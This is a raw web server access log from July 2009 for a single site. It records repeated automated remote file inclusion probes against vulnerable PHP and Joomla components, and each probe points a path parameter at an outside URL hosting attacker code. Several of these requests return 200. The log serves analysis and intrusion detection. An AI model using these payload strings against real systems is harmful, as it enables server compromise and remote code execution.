84.17.129.100 - - [05/Jul/2009:06:44:18 -0700] "GET /logs/access_090521.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:44:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:44:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:44:34 -0700] "GET /logs/access_090525.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:44:51 -0700] "GET /logs/access_090521.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:45:05 -0700] "GET /logs/access_090531.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:11 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:11 -0700] "GET /logs/access_090623.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:12 -0700] "GET /logs/access_090624.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:45:13 -0700] "GET /logs/access_090520.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:13 -0700] "GET /logs/access_090624.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:13 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:17 -0700] "GET /logs/access_090623.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:17 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:17 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:17 -0700] "GET /logs/access_090609.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:45 -0700] "GET /logs/access_090628.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:45:46 -0700] "GET /logs/access_090605.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:52 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:52 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:52 -0700] "GET /logs/access_090624.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:45:52 -0700] "GET /logs/access_090623.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:46:24 -0700] "GET /logs/access_090611.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:38 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:43 -0700] "GET /logs/access_090521.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:44 -0700] "GET /logs/access_090521.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:46:52 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:47:13 -0700] "GET /logs/access_090525.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:47:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
87.106.245.84 - - [05/Jul/2009:06:47:56 -0700] "GET /include/mail.inc.php?skin_board_path=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
87.106.245.84 - - [05/Jul/2009:06:47:56 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:48:27 -0700] "GET /logs/access_090605.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.106.189 - - [05/Jul/2009:06:48:58 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:49:22 -0700] "GET /logs/access_090525.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:49:41 -0700] "GET /logs/access_090531.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:49:47 -0700] "GET /logs/access_090524.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:06:49:53 -0700] "GET /logs/access_090520.log//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:06:49:53 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:06:49:53 -0700] "GET /logs/access_090520.log%20%20//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:06:49:54 -0700] "GET /index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:06:50:03 -0700] "GET /logs/access_090622.log%20%20//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:06:50:13 -0700] "GET /logs/access_090520.log//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:06:50:13 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:06:50:14 -0700] "GET /logs/access_090520.log%20%20//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:06:50:14 -0700] "GET /index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:06:50:26 -0700] "GET /logs/access_090520.log//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:06:50:26 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:06:50:26 -0700] "GET /index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:06:50:26 -0700] "GET /logs/access_090520.log%20%20//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:06:50:32 -0700] "GET /logs/access_090622.log%20%20//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:06:50:37 -0700] "GET /logs/access_090622.log%20%20//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:06:51:06 -0700] "GET /logs/access_090622.log//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:06:51:40 -0700] "GET /logs/access_090622.log//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:52:11 -0700] "GET /logs/access_090528.log%20%20/index.php?pag=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:52:11 -0700] "GET /logs/index.php?pag=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:52:11 -0700] "GET /index.php?pag=http://www.hit168.com.cn/id.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
72.10.166.250 - - [05/Jul/2009:06:52:32 -0700] "GET /logs/access_090530.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
72.10.166.250 - - [05/Jul/2009:06:52:32 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
72.10.166.250 - - [05/Jul/2009:06:52:32 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:06:52:36 -0700] "GET /logs/access_090622.log//index.php?option=com_custompages&cpage=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:53:12 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:53:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:53:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:54:04 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:49 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:49 -0700] "GET /logs/access_090524.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:49 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:49 -0700] "GET /logs/access_090524.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:49 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:50 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.10.166.250 - - [05/Jul/2009:06:54:52 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:55 -0700] "GET /logs/access_090605.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:54:55 -0700] "GET /logs/access_090605.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:55:38 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:55:39 -0700] "GET /logs/access_090524.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:55:39 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:55:45 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:55:45 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:55:46 -0700] "GET /logs/access_090605.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:55:51 -0700] "GET /logs/access_090520.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:06:57:01 -0700] "GET /index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:06:57:03 -0700] "GET /index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:06:57:52 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:06:58:36 -0700] "GET /logs/access_090609.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:06:58:36 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:58:46 -0700] "GET /logs/access_090523.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
119.93.90.155 - - [05/Jul/2009:06:59:32 -0700] "GET /playing.php/common/db.php?commonpath=http://www.buy2pc.co.kr/xml/main_visual_1.xml? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.93.90.155 - - [05/Jul/2009:06:59:46 -0700] "GET /logs/access_090609.log%20%20/playing.php/common/db.php?commonpath=http://www.buy2pc.co.kr/xml/main_visual_1.xml? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.93.90.155 - - [05/Jul/2009:06:59:51 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.buy2pc.co.kr/xml/main_visual_1.xml? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:00:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:00:33 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:00:33 -0700] "GET /logs/access_090530.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:00:42 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:00:42 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:00:42 -0700] "GET /logs/access_090612.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:00:46 -0700] "GET /logs/access_090616.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
